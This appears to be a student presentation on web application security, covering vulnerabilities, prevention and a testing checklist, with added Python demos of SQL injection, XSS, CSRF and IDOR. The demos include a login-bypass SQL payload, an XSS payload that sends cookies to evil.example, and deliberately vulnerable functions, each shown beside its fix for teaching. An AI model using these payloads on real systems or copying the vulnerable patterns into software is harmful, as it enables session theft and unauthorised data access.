
SECURITY OF WEB APPLICATION
GUIDED BY: DR. RACHITA MISHRA
SUBMITTED BY: RISHABH RAJ
REGD NO: 1601227401
BRANCH: IT
WHAT IS WEB APPLICATION SECURITY

Web application security is a branch of information security that deals specifically with the security of websites, web applications and web services. At a high level, web application security draws on the principles of application security but applies them specifically to internet and web systems.
AIM OF WEB SECURITY

• Confidentiality: Sensitive data stored in or handled by the Web application must not be exposed to anyone who is not authorised to see it.

• Integrity: Data held by the Web application stays consistent and cannot be modified by an unauthorised user, or at least not without the change being detected.

• Availability: The Web application must remain accessible to genuine users and must answer their requests within an acceptable time.

• Non-repudiation: A genuine user cannot later deny an action they performed on the Web application (such as a transaction or a data change), and the Web application can prove its own identity to the genuine user (for example through its TLS certificate).
WEB APPLICATION VULNERABILITIES

• SQL Injection
• Broken Authentication
• Sensitive Data Exposure
• Remote File Inclusion
• Cross-site Request Forgery (CSRF)
• Security Misconfiguration
• Cross-Site Scripting (XSS)
• Insecure Deserialization
• Using Components with Known Vulnerabilities
• Insufficient Logging and Monitoring
SOME WEB APPLICATION VULNERABILITIES
• SQL Injection – Occurs when user-supplied input is concatenated into a SQL query, so that an attacker can change the query's structure and make the backend database return, alter or delete data it should not. Consequences include unauthorised reading of whole tables, deletion of tables and, where the query grants it, administrative access to the application.

• Cross-site Scripting (XSS) – An injection attack that targets the application's users rather than its server: attacker-supplied script runs in the victim's browser, where it can steal session cookies, take over accounts, deliver malware or rewrite page content. Stored XSS occurs when the malicious script is saved by the application (in a comment, profile or message) and served to every user who views it. Reflected XSS occurs when script carried in a request (typically a URL parameter) is echoed back in the response and executes in the browser of the user who followed the crafted link.

• Remote File Inclusion – Occurs when the application builds the path for an include or require call from user input and the runtime is allowed to fetch files from remote URLs; the attacker points it at a file on a server they control. The result is execution of attacker-supplied code on the web application server, and from there data theft or manipulation.

• Cross-site Request Forgery (CSRF) – An attack in which a malicious website makes the victim's browser send a request to a site where the victim is already logged in; because the browser attaches the victim's cookies, the site treats the forged request as the user's own. Typical consequences are an unsolicited transfer of funds, a changed password or e-mail address, or data theft.
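The SQL injection described above, shown as an added example that is not part of the original slides: a login lookup that concatenates user input into the query, next to the parameterised version that fixes it. The users table, its rows and the function names are constructed for the demo; it runs against an in-memory SQLite database so nothing external is needed.

```python
"""Added example (not from the original slides): SQL injection in a login
lookup, beside the parameterised query that fixes it.  Uses an in-memory
SQLite database built inline, so it runs offline."""
import sqlite3

# Constructed sample data.  Passwords are kept in clear text ONLY to keep
# the demo short; a real application stores salted hashes.
USERS = [
    ("alice", "s3cret-alice", "admin"),
    ("bob", "hunter2", "user"),
]


def setup_db():
    """Create an in-memory database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, name, password):
    """VULNERABLE: user input is pasted straight into the SQL text, so a
    quote in the input changes the structure of the query."""
    sql = (
        "SELECT name, role FROM users WHERE name = '" + name + "' "
        "AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, name, password):
    """FIXED: placeholders send the input as data.  SQLite never parses it
    as SQL, so the same payload simply matches no row."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


# Classic tautology payload: closes the string literal, ORs in a condition
# that is always true, and comments out the rest (the password check).
PAYLOAD = "' OR '1'='1' -- "

if __name__ == "__main__":
    conn = setup_db()
    print("honest login:   ", login_safe(conn, "bob", "hunter2"))
    # Vulnerable path: every user row comes back without any password.
    print("vulnerable path:", login_vulnerable(conn, PAYLOAD, "x"))
    # Parameterised path: the payload is just an odd username, no match.
    print("parameterised:  ", login_safe(conn, PAYLOAD, "x"))
```

The point of the demo is that the fix is structural, not a filter: no quoting or blacklist of `'` and `--` is applied in `login_safe`, the driver simply never lets the input reach the SQL parser. The same payload against `login_vulnerable` bypasses the password check for every account in the table.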
VULNERABILITIES PREVENTION

• Keep software up to date (framework, libraries, web server and operating system)
• Watch out for SQL Injection: use parameterised queries, never string concatenation
• Protect against XSS attacks: encode all untrusted output for the context it is rendered in
• Beware of error messages: never show stack traces or database errors to users
• Validate on both sides: client-side checks improve usability, but only server-side validation is a security control
• Check your passwords: enforce strength rules and store only salted hashes
• Avoid file uploads where possible; where they are needed, restrict type and size and store uploads outside the web root
• Use HTTPS everywhere, not only on the login page
VULNERABILITIES PREVENTION

From XSS Attack: An intelligent Web Application Firewall (WAF), working in conjunction with a behavioural firewall, can shield known vulnerabilities and block many sophisticated and dangerous attacks. Treat it as a compensating control: the application itself still has to encode its output, because a WAF can be bypassed by payloads it has no signature for.

From DDoS Attack: A reliable and well-reviewed DDoS protection service (upstream filtering plus scalable capacity) is the best defence against DDoS attacks; a single server cannot absorb a volumetric attack on its own.

From SQL Injection: In order to keep your databases secure you should practice regular auditing and remediation of your application, so that any vulnerability is discovered and dealt with as quickly as possible, and run the application's database account with the least privileges it needs.
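The two items the prevention slides leave abstract, "protect against XSS attacks" and the CSRF defence the vulnerability slide implies, in working server-side code. This is an added example, not code from the original slides: the comment payload, the session id, the secret key and the handler names are constructed for the demo.

```python
"""Added example (not from the original slides): the server-side controls
that actually stop XSS and CSRF, contextual output encoding of untrusted
data and a per-session CSRF token checked on every state-changing request.
The secret, session id and form layout are assumptions for the demo."""
import hashlib
import hmac
import html
import secrets

# Constructed sample input: a comment an attacker submitted to a blog.
ATTACKER_COMMENT = (
    '<script>document.location="https://evil.example/?c="'
    '+document.cookie</script>'
)


def render_vulnerable(comment):
    """VULNERABLE: untrusted text is dropped into the HTML unchanged, so
    every visitor's browser runs the attacker's script (stored XSS)."""
    return '<li class="comment">' + comment + "</li>"


def render_safe(comment):
    """FIXED: html.escape() encodes < > & " ' for the HTML text context,
    so the payload is displayed as text, not executed.  Other contexts
    (attribute value, JavaScript, URL) need their own encoder."""
    return '<li class="comment">' + html.escape(comment, quote=True) + "</li>"


# --- CSRF: prove that a state-changing request was built by our own page,
# not by a malicious site the victim's browser was lured to.
SECRET_KEY = secrets.token_bytes(32)  # per-deployment secret (assumption)


def csrf_token(session_id):
    """Derive the token from the session id with an HMAC so the server
    needs no extra storage.  Only a page served from our origin can embed
    it; a form on an attacker's site cannot read or guess it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(session_id, form):
    """Process a money-transfer POST.  Rejects it unless the form carries
    the token that belongs to this session (constant-time comparison).
    `form` is the parsed POST body as a dict (assumption)."""
    expected = csrf_token(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return (403, "CSRF token missing or invalid")
    return (200, f"transferred {form['amount']} to {form['to']}")


if __name__ == "__main__":
    print(render_vulnerable(ATTACKER_COMMENT))
    print(render_safe(ATTACKER_COMMENT))
    sid = "session-abc123"
    # A cross-site form cannot include the right token: rejected.
    print(handle_transfer(sid, {"amount": "1000", "to": "mallory"}))
    # Our own page embedded csrf_token(sid) in a hidden field: accepted.
    print(handle_transfer(sid, {"amount": "50", "to": "bob",
                                "csrf_token": csrf_token(sid)}))
```

Two design points worth noting. The escaping is applied at output time, for the context the data lands in; sanitising on input does not work because the same string may later be rendered in several contexts. The CSRF token is bound to the session, so a token harvested from the attacker's own session is useless against a victim; in a real deployment the `SameSite` cookie attribute is the natural complement to this check.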
WEB APPLICATION SECURITY CHECKLIST

• Information Gathering – Manually review the application, identifying entry points (URLs, parameters, headers, cookies, file uploads) and client-side code. Classify third-party hosted content.

• Authorization – Test the application for path traversal; vertical and horizontal access control issues; missing authorization checks; and insecure direct object references (changing an id in a request to reach another user's data).

• Cryptography – Secure all data in transit. Has the specific data that needs protection been encrypted? Have weak algorithms or key sizes been used? Are tokens and session ids produced by a cryptographically secure random generator?

• Denial of service – Improve an application's resilience against denial of service threats by testing for anti-automation, account lockout (which an attacker can itself abuse to lock out legitimate users), HTTP protocol DoS and SQL wildcard DoS. This doesn't cover protection from high-volume DoS and DDoS attacks, which are best countered by a combination of filtering solutions and scalable resources.
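The authorization item of the checklist, horizontal and vertical access control and insecure direct object references, as an added example that is not part of the original slides. A lookup keyed only on the id taken from the request is the IDOR; the fixed version checks ownership or role on every access, and a small helper plays the tester walking through ids. The invoices, users and roles are constructed for the demo.

```python
"""Added example (not from the original slides): an insecure direct object
reference next to the access-controlled lookup that fixes it, plus the
enumeration test a checklist reviewer would run.  Data is constructed."""

# Constructed sample data: invoices owned by different users, and roles.
INVOICES = {
    101: {"owner": "alice", "amount": 120.0},
    102: {"owner": "bob", "amount": 999.0},
}
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}


class Forbidden(Exception):
    """Raised when the caller is not allowed to access the object."""


def get_invoice_vulnerable(caller, invoice_id):
    """VULNERABLE (IDOR): trusts the id from the URL.  Any logged-in user
    reads any invoice just by changing the number in the request."""
    return INVOICES[invoice_id]


def get_invoice_safe(caller, invoice_id):
    """FIXED: the horizontal check (is the caller the owner?) or the
    vertical check (is the caller an admin?) is enforced on every lookup,
    not only on the listing page that normally links to it."""
    inv = INVOICES.get(invoice_id)
    if inv is None:
        raise KeyError(invoice_id)
    if inv["owner"] != caller and ROLES.get(caller) != "admin":
        # Returning the same response as "not found" is often preferable,
        # so the caller cannot learn which ids exist; kept distinct here
        # for clarity.
        raise Forbidden(f"{caller} may not view invoice {invoice_id}")
    return inv


def enumerate_ids(caller, fetch, candidate_ids):
    """The checklist test: walk a range of ids as `caller` and return the
    ones the given lookup function let us read."""
    readable = []
    for invoice_id in candidate_ids:
        try:
            fetch(caller, invoice_id)
            readable.append(invoice_id)
        except (Forbidden, KeyError):
            pass
    return readable


if __name__ == "__main__":
    ids = range(100, 105)
    print("alice, vulnerable:", enumerate_ids("alice", get_invoice_vulnerable, ids))
    print("alice, fixed:     ", enumerate_ids("alice", get_invoice_safe, ids))
    print("carol (admin):    ", enumerate_ids("carol", get_invoice_safe, ids))
```

Against `get_invoice_vulnerable`, alice reads bob's invoice 102 as easily as her own; against `get_invoice_safe` she sees only 101, while the admin carol sees both. The check lives next to the data access on purpose: an authorization rule enforced only in the navigation layer is exactly what the enumeration test bypasses.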
CONCLUSION

Secure web application development should be enhanced by applying security checkpoints and techniques at early stages of development as well as throughout the software development lifecycle. Special emphasis should be placed on the coding phase of development. Security mechanisms that should be used include threat modeling, risk analysis, static analysis and digital signatures, among others.
REFERENCES

• https://en.wikipedia.org/wiki/Web_application_security

• "2012 Trends Report: Application Security Risks". Cenzic, Inc., 11 March 2012.

• Fonseca, J.; Vieira, M.; Madeira, H. "Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and XSS Attacks". Dependable Computing, IEEE, Dec 2007.

• https://www.techopedia.com/definition/24377/web-application-security

• https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
THANK YOU
